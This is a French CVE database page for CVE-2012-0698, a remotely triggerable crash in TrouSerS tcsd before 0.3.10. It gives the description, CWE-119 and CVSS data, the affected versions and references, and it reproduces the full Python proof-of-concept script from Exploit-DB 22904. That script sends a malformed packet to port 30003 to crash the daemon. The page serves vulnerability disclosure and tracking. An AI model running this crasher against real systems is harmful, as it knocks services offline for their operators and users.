CVE-2012-0698 : Détail

CVE-2012-0698

Overflow
18.87%V4
Network
2012-11-26
10h00 +00:00
2017-08-28
10h57 +00:00
Notifications pour un CVE
Restez informé de toutes modifications pour un CVE spécifique.
Gestion des notifications

Descriptions du CVE

tcsd in TrouSerS before 0.3.10 allows remote attackers to cause a denial of service (daemon crash) via a crafted type_offset value in a TCP packet to port 30003.

Informations du CVE

Faiblesses connexes

CWE-ID Nom de la faiblesse Source
CWE-119 Improper Restriction of Operations within the Bounds of a Memory Buffer
The product performs operations on a memory buffer, but it reads from or writes to a memory location outside the buffer's intended boundary. This may result in read or write operations on unexpected memory locations that could be linked to other variables, data structures, or internal program data.

Métriques

Métriques Score Gravité CVSS Vecteur Source
V2 5 AV:N/AC:L/Au:N/C:N/I:N/A:P nvd@nist.gov

EPSS

EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.

Score EPSS

Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.

Percentile EPSS

Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.

Informations sur l'Exploit

Exploit Database EDB-ID : 22904

Date de publication : 2012-11-22 23h00 +00:00
Auteur : Andy Lutomirski
EDB Vérifié : No

# crash_tcsd.py # Copyright (c) 2012 Andy Lutomirski. All rights reserved. # # Permission is granted to anyone to copy and redistribute this file verbatim. # Permission is *not* granted to distribute modified copies or derivative works. import struct import socket import time # UnloadBlob_PCR_EVENT also appears buggy. crasher = struct.pack('>IIIIIII', 28, # packet_size = sizeof(tcsd_packet_hdr) 11, # ordinal: LoadKeyByBlob 1, # num_parms = 1 (so first getData doesn't bail) 0, # type_size = 0 0x80000000, # type_offset is off in lala land 0, # parm_size = 0 (skip checking) 28, # parm_offset: see getTCSDPacket ) s = socket.socket(socket.AF_INET, socket.SOCK_STREAM, socket.IPPROTO_TCP) s.connect(('127.0.0.1', 30003)) s.send(crasher) s.shutdown(socket.SHUT_WR) s.close()

Products Mentioned

Configuraton 0

Trustedcomputinggroup>>Trousers >> Version To (including) 0.3.9

Trustedcomputinggroup>>Trousers >> Version 0.2.8

Trustedcomputinggroup>>Trousers >> Version 0.2.9

Trustedcomputinggroup>>Trousers >> Version 0.2.9.1

Trustedcomputinggroup>>Trousers >> Version 0.2.9.2

Trustedcomputinggroup>>Trousers >> Version 0.3.0

Trustedcomputinggroup>>Trousers >> Version 0.3.1

Trustedcomputinggroup>>Trousers >> Version 0.3.2

Trustedcomputinggroup>>Trousers >> Version 0.3.3

Trustedcomputinggroup>>Trousers >> Version 0.3.4

Trustedcomputinggroup>>Trousers >> Version 0.3.5

Trustedcomputinggroup>>Trousers >> Version 0.3.6

Trustedcomputinggroup>>Trousers >> Version 0.3.7

Trustedcomputinggroup>>Trousers >> Version 0.3.8

Références

http://www.debian.org/security/2012/dsa-2576
Tags : vendor-advisory, x_refsource_DEBIAN
http://www.exploit-db.com/exploits/22904/
Tags : exploit, x_refsource_EXPLOIT-DB
http://secunia.com/advisories/51295
Tags : third-party-advisory, x_refsource_SECUNIA